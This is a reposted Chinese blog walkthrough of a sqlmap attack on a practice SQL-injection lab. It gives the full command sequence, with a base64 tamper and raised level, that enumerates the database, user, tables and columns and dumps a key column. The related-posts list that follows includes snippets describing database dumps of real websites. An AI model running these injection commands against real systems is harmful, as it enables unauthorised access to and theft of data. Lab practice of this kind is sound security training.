sqlmap一次实战

最新推荐文章于 2024-06-25 09:11:48 发布
最新推荐文章于 2024-06-25 09:11:48 发布
阅读量1.8k 收藏 20
点赞数 2
分类专栏: sqlmap 文章标签: sqlmap spl注入
原文链接:https://www.cnblogs.com/dzkwwj/p/9484671.html
版权

这是墨者学院一个SQL注入漏洞靶场:http://219.153.49.228:49835/show.php?id=MQo= 【目的是寻找key】

【想练习的可以去墨者学院–>在线靶场–>web安全–>sql注入–>sql注入实战-MySQL】 不启动靶场进不去这个链接

进入网站提示的信息如下图所示:

从这个网页提示信息我们也可以窥视出一些东西:

它使用的数据库类型是Mysql
key的值就存储于变量里面(很可能key值就是我们苦苦寻找的flag,那肯定是存储在数据库里面的)

先对其进行手工注入:你们懂得就是 在URL后面分别添加AND 1=1 和 AND 1=2,看两次返回结果是不是一样,不一样说明存在注入漏洞。不知道为啥我的两次返回界面都是空白的。
鉴于这种类型的URL存在注入可能性很大,那必然得用sqlmap跑一跑呐,不放过任何机会。
测试注入:sqlmap -u http://219.153.49.228:49835/show.php?id=MQo=
结果如下:
在这里插入图片描述

sqlmap返回信息显示:参数 id 可能不存在注入,可以尝试增加尝试等级(level),或者增加执行测试的风险(risk)。如果你觉得存在某种保护机制,可以使用tamper篡改注入数据。

根据上面提示信息我们增加level和tamper:sqlmap -u http://219.153.49.228:49835/show.php?id=MQo= --level=3 --tamper=base64encode
在这里插入图片描述

接下来就是常规拖库操作了:

先查一下数据库名:sqlmap -u http://219.153.49.228:49835/show.php?id=MQo= --level=3 --tamper=base64encode --current-db
  【显示数据库名是test】
在这里插入图片描述

在查一下当前用户:sqlmap -u http://219.153.49.228:45162/show.php?id=MQo= --tamper=base64encode --level=3 --current-user
  【显示当前用户是admin(权限等级挺高,有戏)】
在这里插入图片描述

查一下数据库test中有哪些表:sqlmap -u http://219.153.49.228:45162/show.php?id=MQo= --tamper=base64encode --level=3 -D test --tables
  【结果只有一个表:data】
在这里插入图片描述

查一下data表中有几列:sqlmap -u http://219.153.49.228:45162/show.php?id=MQo= --tamper=base64encode --level=3 -D test -T data --columns
  【结果显示有4列】
在这里插入图片描述

从上表中我们可以很清楚就看到thekey所在列的值就是我们苦苦追寻的flag,所以最后一步就是查询thekey的值:
  sqlmap -u http://219.153.49.228:45162/show.php?id=MQo= --tamper=base64encode --level=3 -D test --tables -C thekey --dump
在这里插入图片描述

到此我们成功获取key。

转载自:https://www.cnblogs.com/dzkwwj/p/9484671.html

suancai1993
关注
  • 2
    点赞
  • 20
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【网络安全】sqlmap实战
你在看屏幕的同时,屏幕也在注视着你
04-09 1221
sqlmap实战一、sqlmap配置(1)python27安装(2)sqlmap安装(3)配置环境变量(4)验证是否配置完成二、sqlmap语法(1)常用语法及其说明(2)sqlmap的使用说明三、sqlmap实战实战操作四、总结 一、sqlmap配置 (1)python27安装 python2.7 下载地址 这里可以任意选择一个2.7的版本进行下载. 安装的时候最好自己新建一个python文件夹安装(我这里安装路径为D:\python\python2.7) (2)sqlmap安装 1.sqlmap的 下
SQLMAP使用实战测试
06-12
对于SQLmap的使用教程,挺实用的,详细可能差不多
sqlmap实战
中国好利鹏
10-31 1683
昨天看sqlmap教程的时候,羽翼给我们提供了一个测试站点http://www.slibrary.com/link.php? id=321。我就想了想,都好几年了,这个站肯定修复好了。然后测试了一下, http://www.slibrary.com/link.php?id=321‘ http://www.slibrary.com/link.php?id=321 and 1=1 ht
【网络安全渗透测试零基础入门必知必】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
最新发布
Libra1313的博客
06-25 1142
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段SQLmap第四篇。本阶段主要讲解什么是SQLmap安装和实战案例。
sqlmap入门实践
知足且坚定,温柔且上进
03-09 286
1.判断是否存在注入: 假设目标注入点是http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1,判断其是否存在注入的命令如下所示: python sqlmap.py -u http://127.0.0.1/Sqli_Edited_Version-master/sqlilabs/Less-1/?id=1 结果如下: 2....
转载:sqlmap的应用实战
sinolzeng的专栏
02-13 365
原文链接:https://blog.csdn.net/vala0901/article/details/71548954 有幸在kali中文网上查看了很多大神写的sqlmap的教程,其中还在大神的文章里找到了一个悲催的网站www.bible-history.com/,所以就按照前人总结,给这个悲催的网站脱裤了。。。。下面详细的讲一下怎么给网站脱裤,啊,不,是拖库。。。。。 1.首先要知道可以注入的网址是什么 http://www.bible-history.com/subcat.php?id=..
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
实战篇】第20篇:SQL二次编码注入漏洞实例(附tamper脚本)1
08-03
另外,在实战中,遇到SQL、XSS二次编码绕过的情况,也有遇到的,所以除了单引号,双引号,也应注重%2527、%2522进行测试。 五、结论 SQL二次编码注入漏洞是非常危险的漏洞,攻击者可以通过双重URL编码绕过应用程序...
ibatis入门实例(全代码)
12-29
此外,Ibatis 还提供了一种全局缓存机制,可以提高多次执行相同查询的效率。 总的来说,这个入门实例为我们展示了如何从零开始搭建并使用 Ibatis 框架。通过数据库准备、SQL Map 编写和 Java 代码集成,我们可以...
人生首次面试——护网面试经验.docx
03-30
通过对这份面试记录的分析,我们可以看到,作为一名网络安全领域的求职者,不仅需要具备一定的技术背景和实践经验,还需要在沟通能力和专业知识上有良好的表现。此外,面试前的准备和面试中的态度同样至关重要。
sqli-labs-book
03-26
总的来说,"sqli-labs-book"是一个全面的学习资源,旨在帮助读者掌握SQL注入的各个方面,从基本概念到高级技巧,再到防御策略和实战应用。无论你是初学者还是有一定经验的安全从业者,都能从中受益。在学习过程中,...
SQLMAP系列课程视频.rar
11-13
SQLMAP系列课程视频,
sqlmap注入实战教程(图文详解)
热门推荐
weixin_49071539的博客
12-18 2万+
此教程使用靶场实战演示,仅供学习未经授权切勿用于非法用途 ! 1.发现此网址可能存在sql注入漏洞,我们进行sql盲注入测试一下是否存在漏洞。 地址栏输入 and 1=1 发现页面正常显示。 再次输入and 1=2 页面出现错误,说明该页面可能存在sql注入漏洞 2.现在拿出我们的kali工具,sqlmap进行注入测试。 sqlmap -u http://219.153.49.228:49634/new_list.php?id=1 --dbs 3.可以看到存在注入漏洞,扫到了5个数据库。要获.
SQLMAP基本应用详解(实战演示)
刘桂香263的博客
07-31 4739
SQLMAP自动化注入工具具有扫描、发现并利用给定的URL的SQL漏洞。
sqlmap靶机实战
qq_46485934的博客
09-10 382
一.寻找目标网站的注入点(靶机实战) 寻找注入点,随机点击一篇文章 url :http://117.167.136.244:28026/index/narticle.php?nid=3099 sql注入测试:http://117.167.136.244:28026/index/narticle.php?nid=3099’ 确定存在注入 二.使用sqlmap sqlmap -u “http://117.167.136.244:28026/index/narticle.php?nid=3094” -dbs
DVWA实践: SQL Injection (3 LEVEL) (sqlmap攻破+john解析)
xiaohujiang的博客
07-09 487
准备工作 在VirtureBox安装DVWA虚拟机(基于msf) 准备一台同局域网的KALI Linux 键盘 Session 1:手动sql注入(DVWA security level low) <?php if(isset($_GET['Submit'])){ // Retrieve data $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id =
超详细SQLMap使用攻略及技巧
喜欢Python编程的程序员柚柚呀
12-20 5020
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
SQLmap使用教程图文教程(非常详细)从零基础入门到精通,看完这一篇就够了。
A_991128a的博客
09-07 1810
SQLmap是一款「自动化」SQL注入工具,kali自带。路径 /usr/share/sqlmap打开终端,输入sqlmap,出现以下界面,就说明SQLmap「可用」。1、检测「注入点」2、查看所有「数据库」3、查看当前使用的数据库4、查看「数据表」5、查看「字段」6、查看「数据」
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值